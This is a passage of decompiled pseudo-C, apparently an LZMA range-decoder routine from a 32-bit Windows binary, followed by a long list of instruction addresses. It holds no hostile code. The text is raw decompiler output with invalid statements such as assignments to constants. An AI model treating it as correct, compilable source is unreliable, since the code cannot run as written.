							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                    0x00000000
                    0x004070ab
                    0x004070ab
                    0x004070af
                    0x00407166
                    0x00407169
                    0x00407175
                    0x00407056
                    0x00407056
                    0x00407059
                    0x004073cb
                    0x004073cb
                    0x004073ce
                    0x004073ce
                    0x004073d4
                    0x004073da
                    0x004073e0
                    0x004073fa
                    0x004073fd
                    0x00407403
                    0x0040740e
                    0x00407410
                    0x004073e2
                    0x004073e2
                    0x004073f1
                    0x004073f5
                    0x004073f5
                    0x0040741a
                    0x00407441
                    0x00407441
                    0x00407447
                    0x00407447
                    0x00000000
                    0x0040741c
                    0x0040741c
                    0x00407420
                    0x004075cf
                    0x00000000
                    0x004075cf
                    0x0040742c
                    0x00407433
                    0x0040743b
                    0x0040743e
                    0x00000000
                    0x0040743e
                    0x004070b5
                    0x004070b9
                    0x004075fa
                    0x004075fa
                    0x004075fd
                    0x00407601
                    0x00407601
                    0x004070bf
                    0x004070c5
                    0x004070c8
                    0x004070cc
                    0x004070cf
                    0x004070d3
                    0x00407599
                    0x004075e5
                    0x004075ed
                    0x004075f4
                    0x004075f6
                    0x00000000
                    0x004075f6
                    0x004070d9
                    0x004070dc
                    0x004070e2
                    0x004070e4
                    0x004070e4
                    0x004070e7
                    0x004070ea
                    0x004070ed
                    0x004070f0
                    0x004070f3
                    0x004070f6
                    0x004070f7
                    0x004070f9
                    0x004070f9
                    0x004070f9
                    0x004070fc
                    0x004070ff
                    0x00407102
                    0x00407105
                    0x00407105
                    0x00407108
                    0x0040710a
                    0x0040710a
                    0x0040710d
                    0x0040710d
                    0x0040710d
                    0x00406be3
                    0x00406be3
                    0x00406bec
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x00000000
                    0x00406bfd
                    0x00000000
                    0x00000000
                    0x00406c06
                    0x00406c09
                    0x00406c0c
                    0x00406c10
                    0x00000000
                    0x00000000
                    0x00406c16
                    0x00406c19
                    0x00406c1b
                    0x00406c1c
                    0x00406c1f
                    0x00406c21
                    0x00406c22
                    0x00406c24
                    0x00406c27
                    0x00406c2c
                    0x00406c31
                    0x00406c3a
                    0x00406c4d
                    0x00406c50
                    0x00406c5c
                    0x00406c84
                    0x00406c86
                    0x00406c94
                    0x00406c94
                    0x00406c98
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406c88
                    0x00406c88
                    0x00406c8b
                    0x00406c8c
                    0x00406c8c
                    0x00000000
                    0x00406c88
                    0x00406c62
                    0x00406c67
                    0x00406c67
                    0x00406c70
                    0x00406c78
                    0x00406c7b
                    0x00000000
                    0x00406c81
                    0x00406c81
                    0x00000000
                    0x00406c81
                    0x00000000
                    0x00406c9e
                    0x00406c9e
                    0x00406ca2
                    0x0040754e
                    0x00000000
                    0x0040754e
                    0x00406cab
                    0x00406cbb
                    0x00406cbe
                    0x00406cc1
                    0x00406cc1
                    0x00406cc1
                    0x00406cc4
                    0x00406cc8
                    0x00000000
                    0x00000000
                    0x00406cca
                    0x00406cd0
                    0x00406cfa
                    0x00406d00
                    0x00406d07
                    0x00000000
                    0x00406d07
                    0x00406cd6
                    0x00406cd9
                    0x00406cde
                    0x00406cde
                    0x00406ce9
                    0x00406cf1
                    0x00406cf4
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406d39
                    0x00406d3f
                    0x00406d42
                    0x00406d4f
                    0x00406d57
                    0x00000000
                    0x00000000
                    0x00406d0e
                    0x00406d0e
                    0x00406d12
                    0x0040755d
                    0x00000000
                    0x0040755d
                    0x00406d1e
                    0x00406d29
                    0x00406d29
                    0x00406d29
                    0x00406d2c
                    0x00406d2f
                    0x00406d32
                    0x00406d37
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00406d5f
                    0x00406d61
                    0x00406d64
                    0x00406dd5
                    0x00406dd8
                    0x00406ddb
                    0x00406de2
                    0x00406dec
                    0x00000000
                    0x00406dec
                    0x00406d66
                    0x00406d6a
                    0x00406d6d
                    0x00406d6f
                    0x00406d72
                    0x00406d75
                    0x00406d77
                    0x00406d7a
                    0x00406d7c
                    0x00406d81
                    0x00406d84
                    0x00406d87
                    0x00406d8b
                    0x00406d92
                    0x00406d95
                    0x00406d9c
                    0x00406da0
                    0x00406da8
                    0x00406da8
                    0x00406da8
                    0x00406da2
                    0x00406da2
                    0x00406da2
                    0x00406d97
                    0x00406d97
                    0x00406d97
                    0x00406dac
                    0x00406daf
                    0x00406dcd
                    0x00406dcf
                    0x00000000
                    0x00406db1
                    0x00406db1
                    0x00406db4
                    0x00406db7
                    0x00406dba
                    0x00406dbc
                    0x00406dbc
                    0x00406dbc
                    0x00406dbf
                    0x00406dc2
                    0x00406dc4
                    0x00406dc5
                    0x00406dc8
                    0x00000000
                    0x00406dc8
                    0x00000000
                    0x00406ffe
                    0x00407002
                    0x00407020
                    0x00407023
                    0x0040702a
                    0x0040702d
                    0x00407030
                    0x00407033
                    0x00407036
                    0x00407039
                    0x0040703b
                    0x00407042
                    0x00407043
                    0x00407045
                    0x00407048
                    0x0040704b
                    0x0040704e
                    0x0040704e
                    0x00407053
                    0x00000000
                    0x00407053
                    0x00407004
                    0x00407007
                    0x0040700a
                    0x00407014
                    0x00000000
                    0x00000000
                    0x00407068
                    0x0040706c
                    0x0040708f
                    0x00407092
                    0x00407095
                    0x0040709f
                    0x0040706e
                    0x0040706e
                    0x00407071
                    0x00407074
                    0x00407077
                    0x00407084
                    0x00407087
                    0x00407087
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040711c
                    0x00407120
                    0x00407127
                    0x0040712a
                    0x0040712d
                    0x00407137
                    0x00000000
                    0x00407137
                    0x00407122
                    0x00000000
                    0x00000000
                    0x00407143
                    0x00407147
                    0x0040714e
                    0x00407151
                    0x00407154
                    0x00407149
                    0x00407149
                    0x00407149
                    0x00407157
                    0x0040715a
                    0x0040715d
                    0x0040715d
                    0x00407160
                    0x00407163
                    0x00000000
                    0x00000000
                    0x00407203
                    0x00407203
                    0x00407207
                    0x004075a5
                    0x00000000
                    0x004075a5
                    0x0040720d
                    0x00407210
                    0x00407213
                    0x00407217
                    0x0040721a
                    0x00407220
                    0x00407222
                    0x00407222
                    0x00407222
                    0x00407225
                    0x00407228
                    0x00000000
                    0x00000000
                    0x00406df8
                    0x00406df8
                    0x00406dfc
                    0x00407569
                    0x00000000
                    0x00407569
                    0x00406e02
                    0x00406e05
                    0x00406e08
                    0x00406e0c
                    0x00406e0f
                    0x00406e15
                    0x00406e17
                    0x00406e17
                    0x00406e17
                    0x00406e1a
                    0x00406e1d
                    0x00406e1d
                    0x00406e20
                    0x00406e23
                    0x00000000
                    0x00000000
                    0x00406e29
                    0x00406e2f
                    0x00000000
                    0x00000000
                    0x00406e35
                    0x00406e35
                    0x00406e39
                    0x00406e3c
                    0x00406e3f
                    0x00406e42
                    0x00406e45
                    0x00406e46
                    0x00406e49
                    0x00406e4b
                    0x00406e51
                    0x00406e54
                    0x00406e57
                    0x00406e5a
                    0x00406e5d
                    0x00406e60
                    0x00406e63
                    0x00406e7f
                    0x00406e82
                    0x00406e85
                    0x00406e88
                    0x00406e8f
                    0x00406e93
                    0x00406e95
                    0x00406e99
                    0x00406e65
                    0x00406e65
                    0x00406e69
                    0x00406e71
                    0x00406e76
                    0x00406e78
                    0x00406e7a
                    0x00406e7a
                    0x00406e9c
                    0x00406ea3
                    0x00406ea6
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eb1
                    0x00406eb1
                    0x00406eb5
                    0x00407575
                    0x00000000
                    0x00407575
                    0x00406ebb
                    0x00406ebe
                    0x00406ec1
                    0x00406ec5
                    0x00406ec8
                    0x00406ece
                    0x00406ed0
                    0x00406ed0
                    0x00406ed0
                    0x00406ed3
                    0x00406ed6
                    0x00406ed6
                    0x00406ed6
                    0x00406edc
                    0x00000000
                    0x00000000
                    0x00406ede
                    0x00406ee1
                    0x00406ee4
                    0x00406ee7
                    0x00406eea
                    0x00406eed
                    0x00406ef0
                    0x00406ef3
                    0x00406ef6
                    0x00406ef9
                    0x00406efc
                    0x00406f14
                    0x00406f17
                    0x00406f1a
                    0x00406f1d
                    0x00406f1d
                    0x00406f20
                    0x00406f24
                    0x00406f26
                    0x00406efe
                    0x00406efe
                    0x00406f06
                    0x00406f0b
                    0x00406f0d
                    0x00406f0f
                    0x00406f0f
                    0x00406f29
                    0x00406f30
                    0x00406f33
                    0x00000000
                    0x00406f35
                    0x00000000
                    0x00406f35
                    0x00406f33
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00000000
                    0x00000000
                    0x00406f75
                    0x00406f75
                    0x00406f79
                    0x00407581
                    0x00000000
                    0x00407581
                    0x00406f7f
                    0x00406f82
                    0x00406f85
                    0x00406f89
                    0x00406f8c
                    0x00406f92
                    0x00406f94
                    0x00406f94
                    0x00406f94
                    0x00406f97
                    0x00406f9a
                    0x00406f9a
                    0x00406fa0
                    0x00406f3e
                    0x00406f3e
                    0x00406f41
                    0x00000000
                    0x00406f41
                    0x00406fa2
                    0x00406fa2
                    0x00406fa5
                    0x00406fa8
                    0x00406fab
                    0x00406fae
                    0x00406fb1
                    0x00406fb4
                    0x00406fb7
                    0x00406fba
                    0x00406fbd
                    0x00406fc0
                    0x00406fd8
                    0x00406fdb
                    0x00406fde
                    0x00406fe1
                    0x00406fe1
                    0x00406fe4
                    0x00406fe8
                    0x00406fea
                    0x00406fc2
                    0x00406fc2
                    0x00406fca
                    0x00406fcf
                    0x00406fd1
                    0x00406fd3
                    0x00406fd3
                    0x00406fed
                    0x00406ff4
                    0x00406ff7
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00407286
                    0x00407286
                    0x0040728a
                    0x004075b1
                    0x00000000
